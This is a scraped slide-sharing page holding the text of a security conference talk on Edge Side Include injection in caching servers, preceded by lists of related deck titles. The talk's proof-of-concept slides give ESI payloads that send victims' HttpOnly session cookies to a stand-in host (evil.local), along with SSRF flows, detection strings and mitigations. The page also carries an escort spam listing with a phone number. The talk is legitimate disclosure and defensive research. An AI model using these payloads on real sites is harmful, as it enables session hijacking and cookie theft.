Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Recently uploaded

#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 

Recently uploaded (20)

#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 

Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking

  • 1. Edge Side Include Injection Abusing Caching Servers into SSRF and Transparent Session Hijacking Louis Dion-Marcil @ldionmarcil GoSecure
  • 2. Edge Side Includes (ESI) — Context ❖ New class of attack on some caching servers ❖ Discovered by reading documentation
  • 3. ESI — Brief Overview
  • 4. ESI — Brief Overview The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27°C 23°C 31°C
  • 5. ESI — Brief Overview The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27°C 23°C 31°C Variable Fragments Static Fragment
  • 6. ESI — Brief Overview ❖ Adds fragmentation to caching ❖ App Server send fragment markers in HTTP responses <esi:[action] attr="val" /> ❖ ESI tags are parsed by the HTTP surrogate (load balancer, proxy) ❖ Most engines require specific App Server HTTP Headers
  • 7. ESI Features & Syntax — Include //esi/page-1.html: <html> <p>This is page 1!</p> <esi:include src="//api/page-2.html" /> </html> //api/page-2.html: <p>This is page 2!</p>
  • 8. ESI Features & Syntax — Include $ curl -s http://esi/page-1.html <html> <p>This is page 1!</p> <p>This is page 2!</p> </html>
  • 9. ESI — Include Network Flow (Cache MISS)
  • 10. ESI — Include Network Flow (Cache MISS) ①/1.html
  • 11. ESI — Include Network Flow (Cache MISS) ①/1.html ②/1.html
  • 12. ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③
  • 13. ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ESI tags processed
  • 14. ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html ESI tags processed
  • 15. ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html 2.html⑤ ESI tags processed
  • 16. ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html 2.html⑤ ⑥ + ESI tags processed
  • 17. ESI Features & Syntax — Variables <esi:vars>$(VARIABLE_NAME)</esi:vars>
  • 18. ESI Features & Syntax — Variables <esi:vars>$(VARIABLE_NAME)</esi:vars> $(HTTP_USER_AGENT) → Mozilla/5.0 (X11;[…] $(QUERY_STRING) → city=Montreal&format=C $(HTTP_COOKIE) → _ga=[…]&__utma=[…]
  • 19. ESI — Vulnerabilities ESI tags are sent by the application server… … Parsed by the HTTP Surrogate. How can the ESI Engine tell which tags are legitimate?
  • 20. ESI — Vulnerabilities ESI tags are sent by the application server… … Parsed by the HTTP Surrogate. How can the ESI Engine tell which tags are legitimate? It can’t, and that’s a pretty big design flaw.
  • 21. ESI — Injection <p> City: <?= $_GET['city'] ?> </p>
  • 22. ESI — Injection <p> City: <?= $_GET['city'] ?> </p> <p> City: <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> </p>
  • 23. ESI — Injection <p> City: <?= $_GET['city'] ?> </p> <p> City: <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> </p>
  • 24. ESI Implementations — Apache Traffic Server ❖ Donated by Yahoo! to Apache ❖ ESI stack implemented, with bonus features ❖ Used by Yahoo, Apple
  • 25. ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌
  • 26. ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... or are they? <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌ <esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅
  • 27. ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... or are they? <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌ <esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅ → "_ga=[…]&PHPSESSID=b9gcvscc[…]"
  • 28. DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... "> <img src=" //evil.local/<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ">
  • 29. DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... "> <img src=" //evil.local/<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ">
  • 30. DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... ">
  • 31. DEMO 1 — Proof of concept http://evil.local/username=attacker;session_cookie=s%3A... Internet
  • 32. DEMO 1 Now we know... ❖ … we can inject ESI tags, ❖ … we can leak HTTPOnly cookies, ❖ … we don’t need JavaScript. Let’s crank the impact up a notch.
  • 33. ESI Implementations — Oracle Web Cache ❖ Part of the 11g suite ❖ Usually serves WebLogic Application Servers ❖ Initial ESI specification implemented, plus features
  • 34. DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/? <esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>"); x.send(); </esi:inline>
  • 35. DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/? <esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>"); x.send(); </esi:inline>
  • 36. DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/?lHKlM77VbP79hDnMX2Gg..."); x.send(); </esi:inline>
  • 37. DEMO 2 — Proof of concept http://evil.local/?lHKlM77VbP79hDnMX2Gg... Internet
  • 38. DEMO 2 Now we know... ❖ … we can overwrite arbitrary cache entries, ❖ … we can leak HTTPOnly cookies, ❖ … JavaScript helps, but not required.
  • 39. ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set
  • 40. ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" }
  • 41. ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" } Invalid ESI tag!
  • 42. ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" } "last_name": "<esi:include src=/page-2.html />" ❖ This is valid with Apache Traffic Server Invalid ESI tag!
  • 43. SSRF with Apache Traffic Server
  • 44. SSRF with Apache Traffic Server
  • 45. SSRF with Apache Traffic Server
  • 46. ESI — SSRF Flow ①/api/me /api/me + ESI ②/api/me ③ /server-status server-status⑤ ⑥ + ESI tags processed ④
  • 47. ESI — Manual Detection (by Alex Birsan @alxbrsn) FOO<!--esi -->BAR → FOOBAR ✅ FOO<!--foo -->BAR → FOO<!--foo -->BAR ❌
  • 48. ESI — Manual Detection (by Alex Birsan @alxbrsn) FOO<!--esi -->BAR → FOOBAR ✅ FOO<!--foo -->BAR → FOO<!--foo -->BAR ❌ ESI — Automatic Detection ❖ Burp ActiveScan++ ❖ Burp Upload Scanner ❖ Acunetix
  • 49. ESI — Migration (by Lukas Rieder @overbryd) ❖ Cloudflare Workers https://gist.github.com/Overbryd/c070bb1fa769609d404f648c d506340f
  • 50. Questions? Detailed blogpost of our prior research: https://gosecure.net/2018/04/03/beyond-xss-edge-side-include-injection/ Louis Dion-Marcil @ldionmarcil GoSecure